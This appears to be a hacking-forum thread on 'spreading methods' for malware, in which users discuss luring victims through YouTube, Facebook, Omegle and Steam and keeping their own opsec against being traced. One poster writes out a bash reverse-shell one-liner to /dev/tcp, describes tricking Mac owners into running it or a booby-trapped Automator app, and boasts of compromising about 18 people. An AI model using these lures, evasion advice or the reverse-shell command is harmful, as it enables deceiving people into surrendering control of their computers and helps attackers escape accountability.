The guys which mention Youtube as a form of spreading basically rely on their ability to lie to someone.
Not to mention that the risk of getting caught increases drastically, compared to other, more private methods.
But yeah, as a newbie you can use that, along with FaceBook, Omegle and Steam.

Most forms of spreading nowadays has someone form of privacy issue unless you host the file on a server you own/control your relying on a third party which most likely will report your IP and other info if your using it to spread malware your abusing another persons system.

Always take care of your own opsec to the maximum, cover all bases.

Although you haven't been active for a few months, I thought I'd mention the fact that enticing users via YouTube takes minimal effort.

Common sense Is more so required.

RE: Spreading Methods - Synthx - 02-05-2018

I would usually just find someone with a Mac, and tell them I want to test some open ports on my VPS, and have them run the following reverse shell command:

Code:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
using the VPS I.P. and a different port.
Or, I would make a .app with automator that just installed the shell automatically, the only bad thing about that is, I would have to make a new app every time because I wasn't running a CNC server to use the same port. I think I shelled like 18 people. I stopped doing that recently, but I might start again for testing purposes, and to teach people how to not fall for shit like that as easy as some people do.
